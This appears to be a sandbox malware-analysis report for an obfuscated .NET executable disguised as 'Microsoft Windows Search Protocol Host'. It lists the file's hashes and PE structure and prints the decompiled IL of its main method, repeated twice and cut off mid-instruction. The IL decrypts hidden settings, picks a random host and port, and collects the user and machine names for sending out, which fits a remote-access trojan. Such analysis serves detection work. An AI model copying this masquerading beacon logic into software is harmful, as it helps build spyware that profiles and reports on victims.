Suspicious
Suspect

3d8e1e059c4924d652994cb74c893cfa

PE Executable
|
MD5: 3d8e1e059c4924d652994cb74c893cfa
|
Size: 481.54 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
3d8e1e059c4924d652994cb74c893cfa
Sha1
8995c47fb784ed603d30585bd5be021aaef25d02
Sha256
e4bfe3c56e96d2d6979b9b0af00d783ccca027a3ff87b9d4e1aa7dc3b6208a21
Sha384
9fddc1d488ab48f59feedc922d723ef912e8e80a8f5293f0087eecd7681d4d651a498e1a5fe8543f434fa9e8ba4cca32
Sha512
aaa6776ffa4ea49c1b5855f534e80777b461e4656b19bdf000e70713560c001c795f2b2810d82c9959d2f41b66dfb43eea6005975039d7aae617d54f72f69a29
SSDeep
6144:DS+iqed/619prNJaLuLap5xR62eaCMyCgNUoI7bzqQcoJYg6:+2edYTr3aLCeXghIj3JYt
TLSH
6EA44A147FA98A08D540153E469E2A09CBEAD1F221326307370AFF615D45DDEEE2D3EB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
3d8e1e059c4924d652994cb74c893cfa
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yad7i4kpm66q2iv3t0s5lzbhrr
px3f7aqmhctkn72bt5v
Informations
Name
 Value
Module Name

Microsoft Windows Search Protocol Host
Full Name

Microsoft Windows Search Protocol Host
EntryPoint

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])
Scope Name

Microsoft Windows Search Protocol Host
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Microsoft Windows Search Protocol Host
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

494
Main Method

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])
Main IL Instruction Count

182
Main IL

call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qUBdBhLlgUVdooV() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::HwZDMdsHll() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::MsEhCqBASazqgtSOhMf() stloc V_3 nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pWblrheGNctrP() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() br IL_000E: nop call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() call System.Void WmFCTOGVEoMLPqnHUmcv.awCRRfYYazFPwEvHn::jgoBTbaFRL() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::UlIZovJaKYODAOatHZqUEJrfo call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::nWUTqwdusM() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.ShffEOOCiirES::CERCMDqSlxoGrPGLnPHXUf() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Boolean dwfNaabXSatKyfibA.VHFbZxATavRSJHtDEH::oWXySjCANKVAYWadNLvop(System.String) brtrue IL_0080: call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() leave IL_02AE: ret call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::nLRpKWmWLObNPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brtrue IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::YTldlLangMtBox call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ytbmTnnnDc() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsJtOLvGaqqQ() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qULunqgIbfuZnut() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::YBTydloUMyRylpKIcIwybsA() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wzeNPUbQBOBoXS() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EfrhpYiWlUmweyuQfBFCdG() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsWAwXnWkKTrSkLKoN() ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::tscYxSGyWmRPLyEmpSY() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::zxyBmLGcgTrRoANicUZip() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::RjTuHtNxWsPcevtal() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::EDTIrOzNuvUNYbngIUPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::LeRCvzaLkWJUtqvagPirD() ldelem.ref <null> ldloc V_2 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::HHNFhZgsOwCIqUJBfIhLuM(System.String,System.String) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brfalse IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OixyCMVSoCimWK() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OnTTvIroByZg() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uXQgfqKUWa() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OestiyQjEwx() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::TpBMQPyyjByeYyothnOfefhTk() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::UpMJvByseSdIXg ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::JjCRlaSqsXrIqygDwlQzSCC ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pShHmGTlSRbOXH() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WuwAcgRDKJo() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::txJtxTcqDeRdfNwtc() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::XuXKrVFFqJg() call System.Byte[] mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::RQbocKZgLBSItDwZSvqOEoL() stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::sFvlwCdVbutoIw() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::alXBAPpKemEeMSOMY stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::hYOWxxCwruHktSBO() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::bqNSuMYxhIjAEM stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::NgHXlgGHgTcdAj() call System.String System.Environment::get_UserName() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wsrhrxdhHuSnHhbsVBoqDeCiv() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uBXhbnjRpJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NFlyIHqGLTm stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qpSkDZfgbco() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::pJMKTmWCqixbDdwsrLS stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wrHOQeaSqLGpruTnaeOSOgpRp() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::SkJsSTkVdvxBrGesec stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::PCxTHZFDapTYSnPqNeidsJFs() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::yDOOwojfWejIYEJffxAfvZsJj stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xNWiQBqZUOX() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::drmOfIJufLxPAB stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WEhjoTdTBLaCYTLj() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::gXlfcxqcAlKQML stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EGwENKLiVKody() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::fiVkjcxrtQnvEBYKEf stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ZsVraBtEqcZEmmUKxqHNPIaQJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NsSDjXjbXBvetoEPqXYz stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::VBSIpqDMBJCckhTAQUfIXZOK() call System.String mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::gdqbZjWinCKstkIC() stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh pop <null> leave IL_02AE: ret ret <null>
Module Name

Microsoft Windows Search Protocol Host
Full Name

Microsoft Windows Search Protocol Host
EntryPoint

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])
Scope Name

Microsoft Windows Search Protocol Host
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Microsoft Windows Search Protocol Host
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

494
Main Method

System.Void WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::XpWBMmLzlEJV(System.String[])
Main IL Instruction Count

182
Main IL

call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qUBdBhLlgUVdooV() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::HwZDMdsHll() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::MsEhCqBASazqgtSOhMf() stloc V_3 nop <null> ldloc V_3 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pWblrheGNctrP() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() br IL_000E: nop call System.Void WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::BwvItFTYkrqgeYVvSy() call System.Void WmFCTOGVEoMLPqnHUmcv.awCRRfYYazFPwEvHn::jgoBTbaFRL() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::UlIZovJaKYODAOatHZqUEJrfo call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::nWUTqwdusM() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.ShffEOOCiirES::CERCMDqSlxoGrPGLnPHXUf() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::mcuHPYAjIGqghNVR call System.Boolean dwfNaabXSatKyfibA.VHFbZxATavRSJHtDEH::oWXySjCANKVAYWadNLvop(System.String) brtrue IL_0080: call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() leave IL_02AE: ret call System.Void VudrsYShsxUldsluJ.TDeogDnQjAERDDIHYYyOPa::PWOIDcRcSdJqc() call System.Void mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::nLRpKWmWLObNPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brtrue IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::YTldlLangMtBox call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ytbmTnnnDc() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsJtOLvGaqqQ() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qULunqgIbfuZnut() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::YBTydloUMyRylpKIcIwybsA() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wzeNPUbQBOBoXS() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EfrhpYiWlUmweyuQfBFCdG() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::FsWAwXnWkKTrSkLKoN() ldelem.ref <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::tscYxSGyWmRPLyEmpSY() newarr System.Char dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::zxyBmLGcgTrRoANicUZip() call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::RjTuHtNxWsPcevtal() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::EDTIrOzNuvUNYbngIUPe() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldloc V_1 call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::LeRCvzaLkWJUtqvagPirD() ldelem.ref <null> ldloc V_2 ldsfld System.Random mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::hfWBsMEhfFxLkQYeNFx ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::HHNFhZgsOwCIqUJBfIhLuM(System.String,System.String) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldfld System.Boolean WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::gUHOLJfsWiaSEqECIuZdz brfalse IL_0299: call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OixyCMVSoCimWK() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OnTTvIroByZg() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uXQgfqKUWa() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::OestiyQjEwx() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::TpBMQPyyjByeYyothnOfefhTk() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.xHDzcALpGPuW WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::UpMJvByseSdIXg ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh newobj System.Void mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx::.ctor(WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY) stfld mwltDFeVwgBcJnXnfKXSKoRqD.stoGZVpvcpLx WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::JjCRlaSqsXrIqygDwlQzSCC ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::pShHmGTlSRbOXH() newarr System.Object dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WuwAcgRDKJo() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::txJtxTcqDeRdfNwtc() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::XuXKrVFFqJg() call System.Byte[] mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::RQbocKZgLBSItDwZSvqOEoL() stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::sFvlwCdVbutoIw() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::alXBAPpKemEeMSOMY stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::hYOWxxCwruHktSBO() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::bqNSuMYxhIjAEM stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::NgHXlgGHgTcdAj() call System.String System.Environment::get_UserName() call System.String WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wsrhrxdhHuSnHhbsVBoqDeCiv() call System.String VudrsYShsxUldsluJ.pJhHerEzSSTDafAqjFIgoDv::dODlTesJAVFCRmYLoYAeEFFer(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::uBXhbnjRpJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NFlyIHqGLTm stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qpSkDZfgbco() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::pJMKTmWCqixbDdwsrLS stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wrHOQeaSqLGpruTnaeOSOgpRp() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::SkJsSTkVdvxBrGesec stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::PCxTHZFDapTYSnPqNeidsJFs() ldsfld System.String 